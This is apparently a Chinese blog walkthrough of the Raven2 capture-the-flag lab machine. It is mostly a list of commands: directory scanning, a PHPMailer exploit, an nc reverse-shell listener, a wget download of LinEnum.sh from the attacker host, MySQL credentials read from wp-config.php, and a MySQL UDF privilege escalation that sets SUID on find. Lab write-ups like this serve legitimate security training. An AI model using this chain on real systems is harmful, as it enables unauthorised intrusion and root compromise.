标签:www 192.168 icepeak so mysql Raven2 foo
扫描IP
扫描服务
进入网站收集信息
dirsearch -u "192.168.218.137"
挨个进入查看
http://192.168.218.137/vendor/PATH
找到flag1
搜集信息
php
版本号
邮件网站
CMS为wordpress
使用wpscan扫描
没搜集到
进入msf
search phpmailer
use 0
show options
set 变量
这种方法没成功
使用
searchsploit PHPMailer
cp /usr/share/exploitdb/exploits/php/webapps/40974.py /root/桌面/run
设置变量
vi
:wq保存
python 运行
再使用nc -lvvp 4444 监听
火狐访问木马后门位置
反弹shell
python -c 'import pty; pty.spawn("/bin/bash")'
find / -name flag*
查找flag
/var/www/html/wordpress/wp-content/uploads/2018/11/flag3.png
/var/www/flag2.txt
cat /var/www/flag2.txt
访问网站看到png的flag
下面用到工具LinEnum(Linux枚举及权限提升检查工具)
开启网站服务
靶机下载wget http://192.168.218.129:8080/LinEnum.sh
添加权限chmod +x LinEnum.sh
./LinEnum.sh 运行
翻看查到mysql的root权限
进入登录页面查找数据库账号密码
cat /var/www/html/wordpress/wp-config.php
进入mysql后再进行信息搜集
因为mysql版本>=5.1,所以必须把 UDF 的动态链接库.so文件放置于 MySQL 安装目录下的 lib\plugin 文件夹下文件夹下才能创建自定义函数。
show variables like '%plugin%';
searchsploit udf 搜索漏洞
cp /usr/share/exploitdb/exploits/linux/local/1518.c /root/桌面/run/
gcc -g -c 1518.c
gcc -g -shared -o icepeak.so 1518.o -lc
-g 生成调试信息
-c 编译(二进制)
-shared:创建一个动态链接库,输入文件可以是源文件、汇编文件或者目标文件。
-o:执行命令后的文件名
-lc:-l 库 c库名
靶机下载编译过的文件wget http://192.168.218.129:8081/icepeak.so
mysql -uroot -pR@v3nSecurity 继续登录
use mysql; #进入数据库
create table foo(line blob); #创建数据表foo
insert into foo values(load_file('/tmp/icepeak.so')); #插入数据
select * from foo into dumpfile '/usr/lib/mysql/plugin/icepeak.so'; #( Foo表成功插入二进制数据,然后利用dumpfile函数把文件导出outfile 多行导出,dumpfile一行导出outfile会有特殊的转换,而dumpfile是原数据导新建存储函数)
create function do_system returns integer soname 'icepeak.so'; #(创建自定义函数do_system 类型是integer,别名soname文件名字然后查询函数是否创建成功)
select * from mysql.func;
select do_system('chmod u+s /usr/bin/find'); #(调用do_system函数来给find命令所有者的suid权限,使其可以执行root命令)
quit
whoami
结束
标签:www,
192.168,
icepeak,
so,
mysql,
Raven2,
foo
From: https://www.cnblogs.com/yang-ace/p/17971056